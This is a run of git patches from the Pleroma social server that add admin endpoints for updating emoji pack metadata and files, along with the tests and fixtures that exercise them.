GIT binary patch
literal 256
zcmWIWW@Zs#U|`^2I2p(9A0OT*8Uf_R12HFq3`0^*VqUghL0)=j2qy#cF4@r7Q$So=
z!Og(P@`9Ox0ZhE+`B41)>7++V2?-CrektH&y2Pt+hC@XnZuhYzjGD_PDeO;RYuj`(
zUAMu8(_j4f1g>LGSdR&<=@xdWn#IJs;|^bzfkATSK6P%elQ2Vo
rHzSiAGcLzT0G$W{OBz8ml2chBPDOKOfHx}}NFgH-`UC0NAPxfnZrnv?
literal 0
HcmV?d00001
diff --git a/test/instance_static/emoji/test_pack_nonshared/pack.json b/test/instance_static/emoji/test_pack_nonshared/pack.json
index b49b1efe7..b96781f81 100644
--- a/test/instance_static/emoji/test_pack_nonshared/pack.json
+++ b/test/instance_static/emoji/test_pack_nonshared/pack.json
@@ -4,8 +4,8 @@
"homepage": "https://pleroma.social",
"description": "Test description",
- "fallblack-src": "https://example.com",
- "fallback-src-sha256": "65CDCCBCA9388A68023519F997367783BE69ED42864398CAC568E56F65CE0E75",
+ "fallback-src": "https://nonshared-pack",
+ "fallback-src-sha256": "74409E2674DAA06C072729C6C8426C4CB3B7E0B85ED77792DB7A436E11D76DAF",
"share-files": false
},
diff --git a/test/web/emoji_api_controller_test.exs b/test/web/emoji_api_controller_test.exs
index bf56c1516..aa30e3058 100644
--- a/test/web/emoji_api_controller_test.exs
+++ b/test/web/emoji_api_controller_test.exs
@@ -42,9 +42,10 @@ test "downloading a shared pack from download_shared" do
assert Enum.find(arch, fn {n, _} -> n == 'blank.png' end)
end
- test "downloading a shared pack from another instance via download_from, deleting it" do
+ test "downloading shared & unshared packs from another instance via download_from, deleting them" do
on_exit(fn ->
File.rm_rf!("test/instance_static/emoji/test_pack2")
+ File.rm_rf!("test/instance_static/emoji/test_pack_nonshared2")
end)
mock(fn
@@ -69,6 +70,12 @@ test "downloading a shared pack from another instance via download_from, deletin
|> get(emoji_api_path(conn, :download_shared, "test_pack"))
|> response(200)
|> text()
+
+ %{
+ method: :get,
+ url: "https://nonshared-pack"
+ } ->
+ text(File.read!("test/instance_static/emoji/test_pack_nonshared/nonshared.zip"))
end)
admin = insert(:user, info: %{is_admin: true})
@@ -101,5 +108,36 @@ test "downloading a shared pack from another instance via download_from, deletin
|> response(200) == "ok"
refute File.exists?("test/instance_static/emoji/test_pack2")
+
+ # non-shared, downloaded from the fallback URL
+
+ conn = build_conn()
+
+ assert conn
+ |> put_req_header("content-type", "application/json")
+ |> assign(:user, admin)
+ |> post(
+ emoji_api_path(
+ conn,
+ :download_from
+ ),
+ %{
+ instance_address: "https://example.com",
+ pack_name: "test_pack_nonshared",
+ as: "test_pack_nonshared2"
+ }
+ |> Jason.encode!()
+ )
+ |> text_response(200) == "ok"
+
+ assert File.exists?("test/instance_static/emoji/test_pack_nonshared2/pack.json")
+ assert File.exists?("test/instance_static/emoji/test_pack_nonshared2/blank.png")
+
+ assert conn
+ |> assign(:user, admin)
+ |> delete(emoji_api_path(conn, :delete, "test_pack_nonshared2"))
+ |> response(200) == "ok"
+
+ refute File.exists?("test/instance_static/emoji/test_pack_nonshared2")
end
end
From bcc0bfd0c54784fe6a7ccd88fc083bd09dca41af Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Thu, 15 Aug 2019 19:55:58 +0300
Subject: [PATCH 145/272] Add an endpoint for emoji pack metadata updating
---
.../web/emoji_api/emoji_api_controller.ex | 49 ++++++++++++++++++-
lib/pleroma/web/router.ex | 1 +
2 files changed, 49 insertions(+), 1 deletion(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 3b9eab8b8..4096ccbed 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -196,7 +196,7 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
if pinfo[:fallback] do
pack_file_path = Path.join(pack_dir, "pack.json")
- File.write!(pack_file_path, Jason.encode!(full_pack))
+ File.write!(pack_file_path, Jason.encode!(full_pack, pretty: true))
end
conn |> text("ok")
@@ -222,4 +222,51 @@ def delete(conn, %{"name" => name}) do
conn |> put_status(:internal_server_error) |> text("Couldn't delete the pack #{name}")
end
end
+
+ def update_metadata(conn, %{"name" => name, "new_data" => new_data}) do
+ pack_dir = Path.join(@emoji_dir_path, name)
+ pack_file_p = Path.join(pack_dir, "pack.json")
+
+ full_pack = Jason.decode!(File.read!(pack_file_p))
+
+ new_data =
+ if not is_nil(new_data["fallback-src"]) and is_nil(new_data["fallback-src-sha256"]) do
+ pack_arch = Tesla.get!(new_data["fallback-src"]).body
+
+ {:ok, flist} = :zip.unzip(pack_arch, [:memory])
+
+ # Check if all files from the pack.json are in the archive
+ has_all_files =
+ Enum.all?(full_pack["files"], fn {_, from_manifest} ->
+ Enum.find(flist, fn {from_archive, _} ->
+ to_string(from_archive) == from_manifest
+ end)
+ end)
+
+ unless has_all_files do
+ {:error,
+ conn
+ |> put_status(:bad_request)
+ |> text("The fallback archive does not have all files specified in pack.json")}
+ else
+ fallback_sha = :crypto.hash(:sha256, pack_arch) |> Base.encode16()
+
+ {:ok, new_data |> Map.put("fallback-src-sha256", fallback_sha)}
+ end
+ else
+ {:ok, new_data}
+ end
+
+ case new_data do
+ {:ok, new_data} ->
+ full_pack = Map.put(full_pack, "pack", new_data)
+ File.write!(pack_file_p, Jason.encode!(full_pack, pretty: true))
+
+ # Send new data back with fallback sha filled
+ conn |> json(new_data)
+
+ {:error, e} ->
+ e
+ end
+ end
end
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index 4df0ca3c3..471d09c43 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -218,6 +218,7 @@ defmodule Pleroma.Web.Router do
# Modifying packs
pipe_through([:admin_api, :oauth_write])
+ post("/update_metadata/:name", EmojiAPIController, :update_metadata)
delete("/delete/:name", EmojiAPIController, :delete)
post("/download_from", EmojiAPIController, :download_from)
end
From 9dc9689144a54f3e5513dd26de61ec43421d6d50 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Fri, 16 Aug 2019 13:22:14 +0300
Subject: [PATCH 146/272] Add tests for pack metadata updating
---
.../instance_static/emoji/test_pack/pack.json | 3 -
test/web/emoji_api_controller_test.exs | 118 ++++++++++++++++--
2 files changed, 109 insertions(+), 12 deletions(-)
diff --git a/test/instance_static/emoji/test_pack/pack.json b/test/instance_static/emoji/test_pack/pack.json
index 1b260f0f7..5a8ee75f9 100644
--- a/test/instance_static/emoji/test_pack/pack.json
+++ b/test/instance_static/emoji/test_pack/pack.json
@@ -4,9 +4,6 @@
"homepage": "https://pleroma.social",
"description": "Test description",
- "fallblack-src": "https://example.com",
- "fallback-src-sha256": "65CDCCBCA9388A68023519F997367783BE69ED42864398CAC568E56F65CE0E75",
-
"share-files": true
},
diff --git a/test/web/emoji_api_controller_test.exs b/test/web/emoji_api_controller_test.exs
index aa30e3058..759a4dc04 100644
--- a/test/web/emoji_api_controller_test.exs
+++ b/test/web/emoji_api_controller_test.exs
@@ -5,6 +5,11 @@ defmodule Pleroma.Web.EmojiAPI.EmojiAPIControllerTest do
import Pleroma.Factory
+ @emoji_dir_path Path.join(
+ Pleroma.Config.get!([:instance, :static_dir]),
+ "emoji"
+ )
+
test "shared & non-shared pack information in list_packs is ok" do
conn = build_conn()
resp = conn |> get(emoji_api_path(conn, :list_packs)) |> json_response(200)
@@ -44,8 +49,8 @@ test "downloading a shared pack from download_shared" do
test "downloading shared & unshared packs from another instance via download_from, deleting them" do
on_exit(fn ->
- File.rm_rf!("test/instance_static/emoji/test_pack2")
- File.rm_rf!("test/instance_static/emoji/test_pack_nonshared2")
+ File.rm_rf!("#{@emoji_dir_path}/test_pack2")
+ File.rm_rf!("#{@emoji_dir_path}/test_pack_nonshared2")
end)
mock(fn
@@ -75,7 +80,7 @@ test "downloading shared & unshared packs from another instance via download_fro
method: :get,
url: "https://nonshared-pack"
} ->
- text(File.read!("test/instance_static/emoji/test_pack_nonshared/nonshared.zip"))
+ text(File.read!("#{@emoji_dir_path}/test_pack_nonshared/nonshared.zip"))
end)
admin = insert(:user, info: %{is_admin: true})
@@ -99,15 +104,15 @@ test "downloading shared & unshared packs from another instance via download_fro
)
|> text_response(200) == "ok"
- assert File.exists?("test/instance_static/emoji/test_pack2/pack.json")
- assert File.exists?("test/instance_static/emoji/test_pack2/blank.png")
+ assert File.exists?("#{@emoji_dir_path}/test_pack2/pack.json")
+ assert File.exists?("#{@emoji_dir_path}/test_pack2/blank.png")
assert conn
|> assign(:user, admin)
|> delete(emoji_api_path(conn, :delete, "test_pack2"))
|> response(200) == "ok"
- refute File.exists?("test/instance_static/emoji/test_pack2")
+ refute File.exists?("#{@emoji_dir_path}/test_pack2")
# non-shared, downloaded from the fallback URL
@@ -130,14 +135,109 @@ test "downloading shared & unshared packs from another instance via download_fro
)
|> text_response(200) == "ok"
- assert File.exists?("test/instance_static/emoji/test_pack_nonshared2/pack.json")
- assert File.exists?("test/instance_static/emoji/test_pack_nonshared2/blank.png")
+ assert File.exists?("#{@emoji_dir_path}/test_pack_nonshared2/pack.json")
+ assert File.exists?("#{@emoji_dir_path}/test_pack_nonshared2/blank.png")
assert conn
|> assign(:user, admin)
|> delete(emoji_api_path(conn, :delete, "test_pack_nonshared2"))
|> response(200) == "ok"
- refute File.exists?("test/instance_static/emoji/test_pack_nonshared2")
+ refute File.exists?("#{@emoji_dir_path}/test_pack_nonshared2")
+ end
+
+ describe "updating pack metadata" do
+ setup do
+ pack_file = "#{@emoji_dir_path}/test_pack/pack.json"
+ original_content = File.read!(pack_file)
+
+ on_exit(fn ->
+ File.write!(pack_file, original_content)
+ end)
+
+ {:ok,
+ admin: insert(:user, info: %{is_admin: true}),
+ pack_file: pack_file,
+ new_data: %{
+ "license" => "Test license changed",
+ "homepage" => "https://pleroma.social",
+ "description" => "Test description",
+ "share-files" => false
+ }}
+ end
+
+ test "for a pack without a fallback source", ctx do
+ conn = build_conn()
+
+ assert conn
+ |> assign(:user, ctx[:admin])
+ |> post(
+ emoji_api_path(conn, :update_metadata, "test_pack"),
+ %{
+ "new_data" => ctx[:new_data]
+ }
+ )
+ |> json_response(200) == ctx[:new_data]
+
+ assert Jason.decode!(File.read!(ctx[:pack_file]))["pack"] == ctx[:new_data]
+ end
+
+ test "for a pack with a fallback source", ctx do
+ mock(fn
+ %{
+ method: :get,
+ url: "https://nonshared-pack"
+ } ->
+ text(File.read!("#{@emoji_dir_path}/test_pack_nonshared/nonshared.zip"))
+ end)
+
+ new_data = Map.put(ctx[:new_data], "fallback-src", "https://nonshared-pack")
+
+ new_data_with_sha =
+ Map.put(
+ new_data,
+ "fallback-src-sha256",
+ "74409E2674DAA06C072729C6C8426C4CB3B7E0B85ED77792DB7A436E11D76DAF"
+ )
+
+ conn = build_conn()
+
+ assert conn
+ |> assign(:user, ctx[:admin])
+ |> post(
+ emoji_api_path(conn, :update_metadata, "test_pack"),
+ %{
+ "new_data" => new_data
+ }
+ )
+ |> json_response(200) == new_data_with_sha
+
+ assert Jason.decode!(File.read!(ctx[:pack_file]))["pack"] == new_data_with_sha
+ end
+
+ test "when the fallback source doesn't have all the files", ctx do
+ mock(fn
+ %{
+ method: :get,
+ url: "https://nonshared-pack"
+ } ->
+ {:ok, {'empty.zip', empty_arch}} = :zip.zip('empty.zip', [], [:memory])
+ text(empty_arch)
+ end)
+
+ new_data = Map.put(ctx[:new_data], "fallback-src", "https://nonshared-pack")
+
+ conn = build_conn()
+
+ assert conn
+ |> assign(:user, ctx[:admin])
+ |> post(
+ emoji_api_path(conn, :update_metadata, "test_pack"),
+ %{
+ "new_data" => new_data
+ }
+ )
+ |> text_response(:bad_request) =~ "does not have all"
+ end
end
end
From 261d92f9c2605c720e7fce8b05025e5ac452e5c9 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Fri, 16 Aug 2019 13:30:14 +0300
Subject: [PATCH 147/272] Update the pack fallback-src sha generation condition
The old one would not regenerate sha when fallback src changed
---
lib/pleroma/web/emoji_api/emoji_api_controller.ex | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 4096ccbed..4873129c4 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -229,8 +229,13 @@ def update_metadata(conn, %{"name" => name, "new_data" => new_data}) do
full_pack = Jason.decode!(File.read!(pack_file_p))
+ # The new fallback-src is in the new data and it's not the same as it was in the old data
+ should_update_fb_sha =
+ not is_nil(new_data["fallback-src"]) and
+ new_data["fallback-src"] != full_pack["pack"]["fallback-src"]
+
new_data =
- if not is_nil(new_data["fallback-src"]) and is_nil(new_data["fallback-src-sha256"]) do
+ if should_update_fb_sha do
pack_arch = Tesla.get!(new_data["fallback-src"]).body
{:ok, flist} = :zip.unzip(pack_arch, [:memory])
From 9afe7258dd5ca1e5a6333a5a9f93d9ab43d4aaf4 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Sun, 18 Aug 2019 22:05:38 +0300
Subject: [PATCH 148/272] Implememt emoji pack file updating + write tests
---
.../web/emoji_api/emoji_api_controller.ex | 132 +++++++++++++++++-
lib/pleroma/web/router.ex | 3 +-
test/web/emoji_api_controller_test.exs | 69 ++++++++-
3 files changed, 196 insertions(+), 8 deletions(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 4873129c4..dc3dcf1ea 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -223,7 +223,7 @@ def delete(conn, %{"name" => name}) do
end
end
- def update_metadata(conn, %{"name" => name, "new_data" => new_data}) do
+ def update_metadata(conn, %{"pack_name" => name, "new_data" => new_data}) do
pack_dir = Path.join(@emoji_dir_path, name)
pack_file_p = Path.join(pack_dir, "pack.json")
@@ -274,4 +274,134 @@ def update_metadata(conn, %{"name" => name, "new_data" => new_data}) do
e
end
end
+
+ def update_file(
+ conn,
+ %{"pack_name" => pack_name, "action" => action, "shortcode" => shortcode} = params
+ ) do
+ pack_dir = Path.join(@emoji_dir_path, pack_name)
+ pack_file_p = Path.join(pack_dir, "pack.json")
+
+ full_pack = Jason.decode!(File.read!(pack_file_p))
+
+ res =
+ case action do
+ "add" ->
+ unless Map.has_key?(full_pack["files"], shortcode) do
+ with %{"file" => %Plug.Upload{filename: filename, path: upload_path}} <- params do
+ # If there was a file name provided with the request, use it, otherwise just use the
+ # uploaded file name
+ filename =
+ if Map.has_key?(params, "filename") do
+ params["filename"]
+ else
+ filename
+ end
+
+ file_path = Path.join(pack_dir, filename)
+
+ # If the name contains directories, create them
+ if String.contains?(file_path, "/") do
+ File.mkdir_p!(Path.dirname(file_path))
+ end
+
+ # Copy the uploaded file from the temporary directory
+ File.copy!(upload_path, file_path)
+
+ updated_full_pack = put_in(full_pack, ["files", shortcode], filename)
+
+ {:ok, updated_full_pack}
+ else
+ _ -> {:error, conn |> put_status(:bad_request) |> text("\"file\" not provided")}
+ end
+ else
+ {:error,
+ conn
+ |> put_status(:conflict)
+ |> text("An emoji with the \"#{shortcode}\" shortcode already exists")}
+ end
+
+ "remove" ->
+ if Map.has_key?(full_pack["files"], shortcode) do
+ {emoji_file_path, updated_full_pack} = pop_in(full_pack, ["files", shortcode])
+
+ emoji_file_path = Path.join(pack_dir, emoji_file_path)
+
+ # Delete the emoji file
+ File.rm!(emoji_file_path)
+
+ # If the old directory has no more files, remove it
+ if String.contains?(emoji_file_path, "/") do
+ dir = Path.dirname(emoji_file_path)
+
+ if Enum.empty?(File.ls!(dir)) do
+ File.rmdir!(dir)
+ end
+ end
+
+ {:ok, updated_full_pack}
+ else
+ {:error,
+ conn |> put_status(:bad_request) |> text("Emoji \"#{shortcode}\" does not exist")}
+ end
+
+ "update" ->
+ if Map.has_key?(full_pack["files"], shortcode) do
+ with %{"new_shortcode" => new_shortcode, "new_filename" => new_filename} <- params do
+ # First, remove the old shortcode, saving the old path
+ {old_emoji_file_path, updated_full_pack} = pop_in(full_pack, ["files", shortcode])
+ old_emoji_file_path = Path.join(pack_dir, old_emoji_file_path)
+ new_emoji_file_path = Path.join(pack_dir, new_filename)
+
+ # If the name contains directories, create them
+ if String.contains?(new_emoji_file_path, "/") do
+ File.mkdir_p!(Path.dirname(new_emoji_file_path))
+ end
+
+ # Move/Rename the old filename to a new filename
+ # These are probably on the same filesystem, so just rename should work
+ :ok = File.rename(old_emoji_file_path, new_emoji_file_path)
+
+ # If the old directory has no more files, remove it
+ if String.contains?(old_emoji_file_path, "/") do
+ dir = Path.dirname(old_emoji_file_path)
+
+ if Enum.empty?(File.ls!(dir)) do
+ File.rmdir!(dir)
+ end
+ end
+
+ # Then, put in the new shortcode with the new path
+ updated_full_pack =
+ put_in(updated_full_pack, ["files", new_shortcode], new_filename)
+
+ {:ok, updated_full_pack}
+ else
+ _ ->
+ {:error,
+ conn
+ |> put_status(:bad_request)
+ |> text("new_shortcode or new_file were not specified")}
+ end
+ else
+ {:error,
+ conn |> put_status(:bad_request) |> text("Emoji \"#{shortcode}\" does not exist")}
+ end
+
+ _ ->
+ {:error, conn |> put_status(:bad_request) |> text("Unknown action: #{action}")}
+ end
+
+ case res do
+ {:ok, updated_full_pack} ->
+ # Write the emoji pack file
+ File.write!(pack_file_p, Jason.encode!(updated_full_pack, pretty: true))
+
+ # Return the modified file list
+ conn |> json(updated_full_pack["files"])
+
+ {:error, e} ->
+ e
+ end
+ end
end
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index 471d09c43..acd6f740b 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -218,7 +218,8 @@ defmodule Pleroma.Web.Router do
# Modifying packs
pipe_through([:admin_api, :oauth_write])
- post("/update_metadata/:name", EmojiAPIController, :update_metadata)
+ post("/update_file/:pack_name", EmojiAPIController, :update_file)
+ post("/update_metadata/:pack_name", EmojiAPIController, :update_metadata)
delete("/delete/:name", EmojiAPIController, :delete)
post("/download_from", EmojiAPIController, :download_from)
end
diff --git a/test/web/emoji_api_controller_test.exs b/test/web/emoji_api_controller_test.exs
index 759a4dc04..6d3603da5 100644
--- a/test/web/emoji_api_controller_test.exs
+++ b/test/web/emoji_api_controller_test.exs
@@ -85,11 +85,10 @@ test "downloading shared & unshared packs from another instance via download_fro
admin = insert(:user, info: %{is_admin: true})
- conn = build_conn()
+ conn = build_conn() |> assign(:user, admin)
assert conn
|> put_req_header("content-type", "application/json")
- |> assign(:user, admin)
|> post(
emoji_api_path(
conn,
@@ -108,7 +107,6 @@ test "downloading shared & unshared packs from another instance via download_fro
assert File.exists?("#{@emoji_dir_path}/test_pack2/blank.png")
assert conn
- |> assign(:user, admin)
|> delete(emoji_api_path(conn, :delete, "test_pack2"))
|> response(200) == "ok"
@@ -116,11 +114,10 @@ test "downloading shared & unshared packs from another instance via download_fro
# non-shared, downloaded from the fallback URL
- conn = build_conn()
+ conn = build_conn() |> assign(:user, admin)
assert conn
|> put_req_header("content-type", "application/json")
- |> assign(:user, admin)
|> post(
emoji_api_path(
conn,
@@ -139,7 +136,6 @@ test "downloading shared & unshared packs from another instance via download_fro
assert File.exists?("#{@emoji_dir_path}/test_pack_nonshared2/blank.png")
assert conn
- |> assign(:user, admin)
|> delete(emoji_api_path(conn, :delete, "test_pack_nonshared2"))
|> response(200) == "ok"
@@ -240,4 +236,65 @@ test "when the fallback source doesn't have all the files", ctx do
|> text_response(:bad_request) =~ "does not have all"
end
end
+
+ test "updating pack files" do
+ pack_file = "#{@emoji_dir_path}/test_pack/pack.json"
+ original_content = File.read!(pack_file)
+
+ on_exit(fn ->
+ File.write!(pack_file, original_content)
+
+ File.rm_rf!("#{@emoji_dir_path}/test_pack/dir")
+ File.rm_rf!("#{@emoji_dir_path}/test_pack/dir_2")
+ end)
+
+ admin = insert(:user, info: %{is_admin: true})
+
+ conn = build_conn()
+
+ same_name = %{
+ "action" => "add",
+ "shortcode" => "blank",
+ "filename" => "dir/blank.png",
+ "file" => %Plug.Upload{
+ filename: "blank.png",
+ path: "#{@emoji_dir_path}/test_pack/blank.png"
+ }
+ }
+
+ different_name = %{same_name | "shortcode" => "blank_2"}
+
+ conn = conn |> assign(:user, admin)
+
+ assert conn
+ |> post(emoji_api_path(conn, :update_file, "test_pack"), same_name)
+ |> text_response(:conflict) =~ "already exists"
+
+ assert conn
+ |> post(emoji_api_path(conn, :update_file, "test_pack"), different_name)
+ |> json_response(200) == %{"blank" => "blank.png", "blank_2" => "dir/blank.png"}
+
+ assert File.exists?("#{@emoji_dir_path}/test_pack/dir/blank.png")
+
+ assert conn
+ |> post(emoji_api_path(conn, :update_file, "test_pack"), %{
+ "action" => "update",
+ "shortcode" => "blank_2",
+ "new_shortcode" => "blank_3",
+ "new_filename" => "dir_2/blank_3.png"
+ })
+ |> json_response(200) == %{"blank" => "blank.png", "blank_3" => "dir_2/blank_3.png"}
+
+ refute File.exists?("#{@emoji_dir_path}/test_pack/dir/")
+ assert File.exists?("#{@emoji_dir_path}/test_pack/dir_2/blank_3.png")
+
+ assert conn
+ |> post(emoji_api_path(conn, :update_file, "test_pack"), %{
+ "action" => "remove",
+ "shortcode" => "blank_3"
+ })
+ |> json_response(200) == %{"blank" => "blank.png"}
+
+ refute File.exists?("#{@emoji_dir_path}/test_pack/dir_2/")
+ end
end
From 16edfef12e6781971e2056a80a0ac38dcc254b1b Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Mon, 19 Aug 2019 19:26:15 +0300
Subject: [PATCH 149/272] Handle empty
shortcode/filename/new_shortcode/new_filename
---
.../web/emoji_api/emoji_api_controller.ex | 88 +++++++++++--------
1 file changed, 52 insertions(+), 36 deletions(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index dc3dcf1ea..fdecbb700 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -298,19 +298,27 @@ def update_file(
filename
end
- file_path = Path.join(pack_dir, filename)
+ unless String.trim(shortcode) |> String.length() == 0 or
+ String.trim(filename) |> String.length() == 0 do
+ file_path = Path.join(pack_dir, filename)
- # If the name contains directories, create them
- if String.contains?(file_path, "/") do
- File.mkdir_p!(Path.dirname(file_path))
+ # If the name contains directories, create them
+ if String.contains?(file_path, "/") do
+ File.mkdir_p!(Path.dirname(file_path))
+ end
+
+ # Copy the uploaded file from the temporary directory
+ File.copy!(upload_path, file_path)
+
+ updated_full_pack = put_in(full_pack, ["files", shortcode], filename)
+
+ {:ok, updated_full_pack}
+ else
+ {:error,
+ conn
+ |> put_status(:bad_request)
+ |> text("shortcode or filename cannot be empty")}
end
-
- # Copy the uploaded file from the temporary directory
- File.copy!(upload_path, file_path)
-
- updated_full_pack = put_in(full_pack, ["files", shortcode], filename)
-
- {:ok, updated_full_pack}
else
_ -> {:error, conn |> put_status(:bad_request) |> text("\"file\" not provided")}
end
@@ -348,34 +356,42 @@ def update_file(
"update" ->
if Map.has_key?(full_pack["files"], shortcode) do
with %{"new_shortcode" => new_shortcode, "new_filename" => new_filename} <- params do
- # First, remove the old shortcode, saving the old path
- {old_emoji_file_path, updated_full_pack} = pop_in(full_pack, ["files", shortcode])
- old_emoji_file_path = Path.join(pack_dir, old_emoji_file_path)
- new_emoji_file_path = Path.join(pack_dir, new_filename)
+ unless String.trim(new_shortcode) |> String.length() == 0 or
+ String.trim(new_filename) |> String.length() == 0 do
+ # First, remove the old shortcode, saving the old path
+ {old_emoji_file_path, updated_full_pack} = pop_in(full_pack, ["files", shortcode])
+ old_emoji_file_path = Path.join(pack_dir, old_emoji_file_path)
+ new_emoji_file_path = Path.join(pack_dir, new_filename)
- # If the name contains directories, create them
- if String.contains?(new_emoji_file_path, "/") do
- File.mkdir_p!(Path.dirname(new_emoji_file_path))
- end
-
- # Move/Rename the old filename to a new filename
- # These are probably on the same filesystem, so just rename should work
- :ok = File.rename(old_emoji_file_path, new_emoji_file_path)
-
- # If the old directory has no more files, remove it
- if String.contains?(old_emoji_file_path, "/") do
- dir = Path.dirname(old_emoji_file_path)
-
- if Enum.empty?(File.ls!(dir)) do
- File.rmdir!(dir)
+ # If the name contains directories, create them
+ if String.contains?(new_emoji_file_path, "/") do
+ File.mkdir_p!(Path.dirname(new_emoji_file_path))
end
+
+ # Move/Rename the old filename to a new filename
+ # These are probably on the same filesystem, so just rename should work
+ :ok = File.rename(old_emoji_file_path, new_emoji_file_path)
+
+ # If the old directory has no more files, remove it
+ if String.contains?(old_emoji_file_path, "/") do
+ dir = Path.dirname(old_emoji_file_path)
+
+ if Enum.empty?(File.ls!(dir)) do
+ File.rmdir!(dir)
+ end
+ end
+
+ # Then, put in the new shortcode with the new path
+ updated_full_pack =
+ put_in(updated_full_pack, ["files", new_shortcode], new_filename)
+
+ {:ok, updated_full_pack}
+ else
+ {:error,
+ conn
+ |> put_status(:bad_request)
+ |> text("new_shortcode or new_filename cannot be empty")}
end
-
- # Then, put in the new shortcode with the new path
- updated_full_pack =
- put_in(updated_full_pack, ["files", new_shortcode], new_filename)
-
- {:ok, updated_full_pack}
else
_ ->
{:error,
From 8dbdd5c280d15fde4712989001d4ddee1cd37cff Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Tue, 20 Aug 2019 14:52:36 +0300
Subject: [PATCH 150/272] Allow uploading new emojis to packs from URLs
---
.../web/emoji_api/emoji_api_controller.ex | 65 ++++++++++---------
test/web/emoji_api_controller_test.exs | 34 ++++++++++
2 files changed, 69 insertions(+), 30 deletions(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index fdecbb700..87ae0e092 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -288,39 +288,44 @@ def update_file(
case action do
"add" ->
unless Map.has_key?(full_pack["files"], shortcode) do
- with %{"file" => %Plug.Upload{filename: filename, path: upload_path}} <- params do
- # If there was a file name provided with the request, use it, otherwise just use the
- # uploaded file name
- filename =
- if Map.has_key?(params, "filename") do
- params["filename"]
- else
- filename
- end
-
- unless String.trim(shortcode) |> String.length() == 0 or
- String.trim(filename) |> String.length() == 0 do
- file_path = Path.join(pack_dir, filename)
-
- # If the name contains directories, create them
- if String.contains?(file_path, "/") do
- File.mkdir_p!(Path.dirname(file_path))
- end
-
- # Copy the uploaded file from the temporary directory
- File.copy!(upload_path, file_path)
-
- updated_full_pack = put_in(full_pack, ["files", shortcode], filename)
-
- {:ok, updated_full_pack}
+ filename =
+ if Map.has_key?(params, "filename") do
+ params["filename"]
else
- {:error,
- conn
- |> put_status(:bad_request)
- |> text("shortcode or filename cannot be empty")}
+ case params["file"] do
+ %Plug.Upload{filename: filename} -> filename
+ url when is_binary(url) -> Path.basename(url)
+ end
end
+
+ unless String.trim(shortcode) |> String.length() == 0 or
+ String.trim(filename) |> String.length() == 0 do
+ file_path = Path.join(pack_dir, filename)
+
+ # If the name contains directories, create them
+ if String.contains?(file_path, "/") do
+ File.mkdir_p!(Path.dirname(file_path))
+ end
+
+ case params["file"] do
+ %Plug.Upload{path: upload_path} ->
+ # Copy the uploaded file from the temporary directory
+ File.copy!(upload_path, file_path)
+
+ url when is_binary(url) ->
+ # Download and write the file
+ file_contents = Tesla.get!(url).body
+ File.write!(file_path, file_contents)
+ end
+
+ updated_full_pack = put_in(full_pack, ["files", shortcode], filename)
+
+ {:ok, updated_full_pack}
else
- _ -> {:error, conn |> put_status(:bad_request) |> text("\"file\" not provided")}
+ {:error,
+ conn
+ |> put_status(:bad_request)
+ |> text("shortcode or filename cannot be empty")}
end
else
{:error,
diff --git a/test/web/emoji_api_controller_test.exs b/test/web/emoji_api_controller_test.exs
index 6d3603da5..c1aece691 100644
--- a/test/web/emoji_api_controller_test.exs
+++ b/test/web/emoji_api_controller_test.exs
@@ -244,6 +244,7 @@ test "updating pack files" do
on_exit(fn ->
File.write!(pack_file, original_content)
+ File.rm_rf!("#{@emoji_dir_path}/test_pack/blank_url.png")
File.rm_rf!("#{@emoji_dir_path}/test_pack/dir")
File.rm_rf!("#{@emoji_dir_path}/test_pack/dir_2")
end)
@@ -296,5 +297,38 @@ test "updating pack files" do
|> json_response(200) == %{"blank" => "blank.png"}
refute File.exists?("#{@emoji_dir_path}/test_pack/dir_2/")
+
+ mock(fn
+ %{
+ method: :get,
+ url: "https://test-blank/blank_url.png"
+ } ->
+ text(File.read!("#{@emoji_dir_path}/test_pack/blank.png"))
+ end)
+
+ # The name should be inferred from the URL ending
+ from_url = %{
+ "action" => "add",
+ "shortcode" => "blank_url",
+ "file" => "https://test-blank/blank_url.png"
+ }
+
+ assert conn
+ |> post(emoji_api_path(conn, :update_file, "test_pack"), from_url)
+ |> json_response(200) == %{
+ "blank" => "blank.png",
+ "blank_url" => "blank_url.png"
+ }
+
+ assert File.exists?("#{@emoji_dir_path}/test_pack/blank_url.png")
+
+ assert conn
+ |> post(emoji_api_path(conn, :update_file, "test_pack"), %{
+ "action" => "remove",
+ "shortcode" => "blank_url"
+ })
+ |> json_response(200) == %{"blank" => "blank.png"}
+
